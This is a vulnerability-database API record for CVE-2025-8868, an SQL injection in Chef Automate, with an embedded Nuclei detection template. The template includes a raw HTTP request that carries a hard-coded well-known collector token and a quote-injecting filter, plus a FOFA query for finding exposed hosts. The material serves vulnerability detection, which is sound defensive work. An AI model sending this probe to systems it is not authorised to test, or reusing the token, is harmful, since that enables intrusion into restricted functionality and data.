{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2025-8868/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2025-8868/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2025-8868/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2025-8868/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2025-8868/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2025-8868"},"sightings":{"href":"/api/v1/sightings/cve-2025-8868"}},"data":{"nuclei":true,"nuclei_template":"http/cves/2025/CVE-2025-8868.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2025-8868\n\ninfo:\n  name: Chef Automate < 4.13.295 — SQL Injection\n  author: 3th1c_yuk1,xbow\n  severity: critical\n  description: |\n    In Progress Chef Automate, versions earlier than 4.13.295, on Linux x86 platform, an authenticated attacker can gain access to Chef Automate restricted functionality in the compliance service via improperly neutralized inputs used in an SQL command using a well-known token.\n  impact: |\n    Authenticated attackers with knowledge of a well-known token can execute arbitrary SQL queries through the compliance service, potentially gaining access to restricted functionality and sensitive data.\n  remediation: |\n    Upgrade to version 4.13.295 or later.\n  reference:\n    - https://xbow.com/blog/cooking-an-sql-injection-vulnerability-in-chef-automate\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-8868\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2025-8868\n    epss-score: 0.24317\n    epss-percentile: 0.97786\n    cwe-id: CWE-89\n  metadata:\n    verified: true\n    max-request: 1\n    fofa-query: body=\"Chef Automate\"\n  tags: cve,cve2025,chef,automate,sqli,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /api/v0/compliance/profiles/search HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        x-data-collector-token: 93a49a4f2482c64126f7b6015e6b0f30284287ee4054ff8807fb63d9cbd1c506\n\n        {\"filters\": [{\"type\": \"name'\", \"values\": [\"test\"]}]}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"status_code == 500\"\n          - \"contains(body, 'pq: syntax error')\"\n          - \"contains(content_type, 'application/json')\"\n        condition: and\n# digest: 4a0a0047304502205f51b6cb2a17219130e9fd4a7b0ee9272ca70d0d2d537fbe51505ff175176294022100d13161f7ec047cdbda171279dab5186382e7a0764a35649497bc3524839ea81e:922c64590222798bb761d5b6d8e72950"},"source":"nuclei","vuln_id":"cve-2025-8868"}